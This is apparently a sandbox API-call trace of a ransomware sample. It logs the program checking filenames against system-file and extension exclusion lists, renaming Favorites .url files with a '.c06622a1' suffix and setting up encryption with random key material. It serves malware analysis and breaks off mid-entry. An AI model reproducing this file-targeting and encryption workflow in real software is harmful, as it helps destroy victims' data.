[0159.196] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.196] wcslen (_String="ics") returned 0x3 [0159.196] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.196] wcslen (_String="idx") returned 0x3 [0159.196] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.196] wcslen (_String="ldf") returned 0x3 [0159.196] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.196] wcslen (_String="lnk") returned 0x3 [0159.196] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.196] wcslen (_String="mod") returned 0x3 [0159.196] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.196] wcslen (_String="mpa") returned 0x3 [0159.196] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.196] wcslen (_String="msc") returned 0x3 [0159.196] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.196] wcslen (_String="msp") returned 0x3 [0159.196] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.196] wcslen (_String="msstyles") returned 0x8 [0159.196] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.196] wcslen (_String="msu") returned 0x3 [0159.196] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.196] wcslen (_String="nls") returned 0x3 [0159.196] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.196] wcslen (_String="nomedia") returned 0x7 [0159.196] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.196] wcslen (_String="ocx") returned 0x3 [0159.196] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.196] wcslen (_String="prf") returned 0x3 [0159.196] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.196] wcslen (_String="ps1") returned 0x3 [0159.196] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.196] wcslen (_String="rom") returned 0x3 [0159.196] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.196] wcslen (_String="rtp") returned 0x3 [0159.196] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.197] wcslen (_String="scr") returned 0x3 [0159.197] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.197] wcslen (_String="shs") returned 0x3 [0159.197] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.197] wcslen (_String="spl") returned 0x3 [0159.197] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.197] wcslen (_String="sys") returned 0x3 [0159.197] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.197] wcslen (_String="theme") returned 0x5 [0159.197] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.197] wcslen (_String="themepack") returned 0x9 [0159.197] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.197] wcslen (_String="wpx") returned 0x3 [0159.197] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.197] wcslen (_String="lock") returned 0x4 [0159.197] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.197] wcslen (_String="key") returned 0x3 [0159.197] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.197] wcslen (_String="hta") returned 0x3 [0159.197] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.197] wcslen (_String="msi") returned 0x3 [0159.197] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.197] wcslen (_String="pdb") returned 0x3 [0159.197] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.197] wcslen (_String="sqlite") returned 0x6 [0159.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0159.197] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.197] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0159.197] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0159.197] wcscpy (in: _Dest=0x32400d2, _Source="MSN Entertainment.url" | out: _Dest="MSN Entertainment.url") returned="MSN Entertainment.url" [0159.198] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x80) returned 1 [0159.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0159.198] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.198] CloseHandle (hObject=0x1a0) returned 1 [0159.198] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.198] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" [0159.198] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 0x4e [0159.198] wcscpy (in: _Dest=0x3250104, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.198] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.c06622a1"), dwFlags=0x8) returned 1 [0159.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0159.200] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.200] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0159.208] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36aecc91 [0159.208] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b9258f9 [0159.208] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x64abd4cb [0159.208] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x74d1ae3c [0159.208] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb8da61a [0159.208] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x656e9931 [0159.208] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c350d39 [0159.208] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d2f6185 [0159.212] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0x58f51d19 [0159.212] RtlComputeCrc32 (PartialCrc=0x1d19, Buffer=0x35a0094, Length=0x80) returned 0xf37c26cf [0159.212] RtlComputeCrc32 (PartialCrc=0x26cf, Buffer=0x35a0094, Length=0x80) returned 0x41e3658e [0159.212] RtlComputeCrc32 (PartialCrc=0x658e, Buffer=0x35a0094, Length=0x80) returned 0xe09a631c [0159.212] RtlComputeCrc32 (PartialCrc=0x631c, Buffer=0x35a0094, Length=0x80) returned 0xab96a097 [0159.212] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0159.212] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.212] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.212] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0159.212] _wcsicmp (_Str1="MSN Money.url", _Str2="README.c06622a1.TXT") returned -5 [0159.212] wcsstr (_Str="MSN Money.url", _SubStr="README") returned 0x0 [0159.212] _wcsicmp (_Str1="autorun.inf", _Str2="MSN Money.url") returned -12 [0159.212] wcslen (_String="autorun.inf") returned 0xb [0159.212] _wcsicmp (_Str1="boot.ini", _Str2="MSN Money.url") returned -11 [0159.212] wcslen (_String="boot.ini") returned 0x8 [0159.212] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN Money.url") returned -11 [0159.212] wcslen (_String="bootfont.bin") returned 0xc [0159.212] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN Money.url") returned -11 [0159.212] wcslen (_String="bootsect.bak") returned 0xc [0159.212] _wcsicmp (_Str1="desktop.ini", _Str2="MSN Money.url") returned -9 [0159.212] wcslen (_String="desktop.ini") returned 0xb [0159.213] _wcsicmp (_Str1="iconcache.db", _Str2="MSN Money.url") returned -4 [0159.213] wcslen (_String="iconcache.db") returned 0xc [0159.213] _wcsicmp (_Str1="ntldr", _Str2="MSN Money.url") returned 1 [0159.213] wcslen (_String="ntldr") returned 0x5 [0159.213] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN Money.url") returned 1 [0159.213] wcslen (_String="ntuser.dat") returned 0xa [0159.213] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN Money.url") returned 1 [0159.213] wcslen (_String="ntuser.dat.log") returned 0xe [0159.213] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN Money.url") returned 1 [0159.213] wcslen (_String="ntuser.ini") returned 0xa [0159.213] _wcsicmp (_Str1="thumbs.db", _Str2="MSN Money.url") returned 7 [0159.213] wcslen (_String="thumbs.db") returned 0x9 [0159.213] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.213] wcslen (_String="386") returned 0x3 [0159.213] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.213] wcslen (_String="adv") returned 0x3 [0159.213] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.213] wcslen (_String="ani") returned 0x3 [0159.213] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.213] wcslen (_String="bat") returned 0x3 [0159.213] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.213] wcslen (_String="bin") returned 0x3 [0159.213] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.213] wcslen (_String="cab") returned 0x3 [0159.213] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.213] wcslen (_String="cmd") returned 0x3 [0159.213] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.213] wcslen (_String="com") returned 0x3 [0159.213] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.213] wcslen (_String="cpl") returned 0x3 [0159.214] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.214] wcslen (_String="cur") returned 0x3 [0159.214] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.214] wcslen (_String="deskthemepack") returned 0xd [0159.214] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.214] wcslen (_String="diagcab") returned 0x7 [0159.214] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.214] wcslen (_String="diagcfg") returned 0x7 [0159.214] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.214] wcslen (_String="diagpkg") returned 0x7 [0159.214] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.214] wcslen (_String="dll") returned 0x3 [0159.214] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.214] wcslen (_String="drv") returned 0x3 [0159.214] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.214] wcslen (_String="exe") returned 0x3 [0159.214] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.214] wcslen (_String="hlp") returned 0x3 [0159.214] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.214] wcslen (_String="icl") returned 0x3 [0159.214] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.214] wcslen (_String="icns") returned 0x4 [0159.214] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.214] wcslen (_String="ico") returned 0x3 [0159.214] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.214] wcslen (_String="ics") returned 0x3 [0159.214] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.214] wcslen (_String="idx") returned 0x3 [0159.214] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.214] wcslen (_String="ldf") returned 0x3 [0159.215] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.215] wcslen (_String="lnk") returned 0x3 [0159.215] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.215] wcslen (_String="mod") returned 0x3 [0159.215] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.215] wcslen (_String="mpa") returned 0x3 [0159.215] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.215] wcslen (_String="msc") returned 0x3 [0159.215] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.215] wcslen (_String="msp") returned 0x3 [0159.215] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.215] wcslen (_String="msstyles") returned 0x8 [0159.215] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.215] wcslen (_String="msu") returned 0x3 [0159.215] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.215] wcslen (_String="nls") returned 0x3 [0159.215] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.215] wcslen (_String="nomedia") returned 0x7 [0159.215] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.215] wcslen (_String="ocx") returned 0x3 [0159.215] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.215] wcslen (_String="prf") returned 0x3 [0159.215] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.215] wcslen (_String="ps1") returned 0x3 [0159.215] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.215] wcslen (_String="rom") returned 0x3 [0159.215] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.215] wcslen (_String="rtp") returned 0x3 [0159.215] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.215] wcslen (_String="scr") returned 0x3 [0159.215] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.216] wcslen (_String="shs") returned 0x3 [0159.216] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.216] wcslen (_String="spl") returned 0x3 [0159.216] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.216] wcslen (_String="sys") returned 0x3 [0159.216] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.216] wcslen (_String="theme") returned 0x5 [0159.216] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.216] wcslen (_String="themepack") returned 0x9 [0159.216] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.216] wcslen (_String="wpx") returned 0x3 [0159.216] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.216] wcslen (_String="lock") returned 0x4 [0159.216] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.216] wcslen (_String="key") returned 0x3 [0159.216] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.216] wcslen (_String="hta") returned 0x3 [0159.216] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.216] wcslen (_String="msi") returned 0x3 [0159.216] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.216] wcslen (_String="pdb") returned 0x3 [0159.216] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.216] wcslen (_String="sqlite") returned 0x6 [0159.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0159.216] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.216] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0159.216] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0159.216] wcscpy (in: _Dest=0x32400d2, _Source="MSN Money.url" | out: _Dest="MSN Money.url") returned="MSN Money.url" [0159.216] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x80) returned 1 [0159.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0159.217] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.217] CloseHandle (hObject=0x1f0) returned 1 [0159.217] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.217] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" [0159.217] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 0x46 [0159.217] wcscpy (in: _Dest=0x32500f4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.217] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.c06622a1"), dwFlags=0x8) returned 1 [0159.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f0 [0159.219] CreateIoCompletionPort (FileHandle=0x1f0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.219] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0159.226] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3874536d [0159.226] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x74299bb4 [0159.227] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29588213 [0159.227] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55130d0b [0159.227] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50aca430 [0159.227] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x26752223 [0159.227] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1baaf45c [0159.227] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77ce7f78 [0159.230] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0x576989bc [0159.230] RtlComputeCrc32 (PartialCrc=0x89bc, Buffer=0x3630094, Length=0x80) returned 0x38108f66 [0159.230] RtlComputeCrc32 (PartialCrc=0x8f66, Buffer=0x3630094, Length=0x80) returned 0xaf3ac04a [0159.230] RtlComputeCrc32 (PartialCrc=0xc04a, Buffer=0x3630094, Length=0x80) returned 0x900f8251 [0159.230] RtlComputeCrc32 (PartialCrc=0x8251, Buffer=0x3630094, Length=0x80) returned 0xcc6ac01 [0159.230] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0159.230] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.230] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.230] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0159.230] _wcsicmp (_Str1="MSN Sports.url", _Str2="README.c06622a1.TXT") returned -5 [0159.230] wcsstr (_Str="MSN Sports.url", _SubStr="README") returned 0x0 [0159.230] _wcsicmp (_Str1="autorun.inf", _Str2="MSN Sports.url") returned -12 [0159.230] wcslen (_String="autorun.inf") returned 0xb [0159.230] _wcsicmp (_Str1="boot.ini", _Str2="MSN Sports.url") returned -11 [0159.230] wcslen (_String="boot.ini") returned 0x8 [0159.230] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN Sports.url") returned -11 [0159.230] wcslen (_String="bootfont.bin") returned 0xc [0159.230] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN Sports.url") returned -11 [0159.230] wcslen (_String="bootsect.bak") returned 0xc [0159.230] _wcsicmp (_Str1="desktop.ini", _Str2="MSN Sports.url") returned -9 [0159.230] wcslen (_String="desktop.ini") returned 0xb [0159.231] _wcsicmp (_Str1="iconcache.db", _Str2="MSN Sports.url") returned -4 [0159.231] wcslen (_String="iconcache.db") returned 0xc [0159.231] _wcsicmp (_Str1="ntldr", _Str2="MSN Sports.url") returned 1 [0159.231] wcslen (_String="ntldr") returned 0x5 [0159.231] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN Sports.url") returned 1 [0159.231] wcslen (_String="ntuser.dat") returned 0xa [0159.231] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN Sports.url") returned 1 [0159.231] wcslen (_String="ntuser.dat.log") returned 0xe [0159.231] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN Sports.url") returned 1 [0159.231] wcslen (_String="ntuser.ini") returned 0xa [0159.231] _wcsicmp (_Str1="thumbs.db", _Str2="MSN Sports.url") returned 7 [0159.231] wcslen (_String="thumbs.db") returned 0x9 [0159.231] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.231] wcslen (_String="386") returned 0x3 [0159.231] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.231] wcslen (_String="adv") returned 0x3 [0159.231] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.231] wcslen (_String="ani") returned 0x3 [0159.231] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.231] wcslen (_String="bat") returned 0x3 [0159.231] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.231] wcslen (_String="bin") returned 0x3 [0159.231] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.231] wcslen (_String="cab") returned 0x3 [0159.231] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.231] wcslen (_String="cmd") returned 0x3 [0159.231] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.231] wcslen (_String="com") returned 0x3 [0159.231] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.231] wcslen (_String="cpl") returned 0x3 [0159.231] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.231] wcslen (_String="cur") returned 0x3 [0159.231] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.231] wcslen (_String="deskthemepack") returned 0xd [0159.231] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.231] wcslen (_String="diagcab") returned 0x7 [0159.232] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.232] wcslen (_String="diagcfg") returned 0x7 [0159.232] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.232] wcslen (_String="diagpkg") returned 0x7 [0159.232] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.232] wcslen (_String="dll") returned 0x3 [0159.232] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.232] wcslen (_String="drv") returned 0x3 [0159.232] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.232] wcslen (_String="exe") returned 0x3 [0159.232] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.232] wcslen (_String="hlp") returned 0x3 [0159.232] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.232] wcslen (_String="icl") returned 0x3 [0159.232] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.232] wcslen (_String="icns") returned 0x4 [0159.232] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.232] wcslen (_String="ico") returned 0x3 [0159.232] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.232] wcslen (_String="ics") returned 0x3 [0159.232] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.232] wcslen (_String="idx") returned 0x3 [0159.232] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.232] wcslen (_String="ldf") returned 0x3 [0159.232] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.232] wcslen (_String="lnk") returned 0x3 [0159.232] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.232] wcslen (_String="mod") returned 0x3 [0159.232] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.232] wcslen (_String="mpa") returned 0x3 [0159.232] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.232] wcslen (_String="msc") returned 0x3 [0159.232] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.232] wcslen (_String="msp") returned 0x3 [0159.232] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.232] wcslen (_String="msstyles") returned 0x8 [0159.232] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.233] wcslen (_String="msu") returned 0x3 [0159.233] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.233] wcslen (_String="nls") returned 0x3 [0159.233] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.233] wcslen (_String="nomedia") returned 0x7 [0159.233] 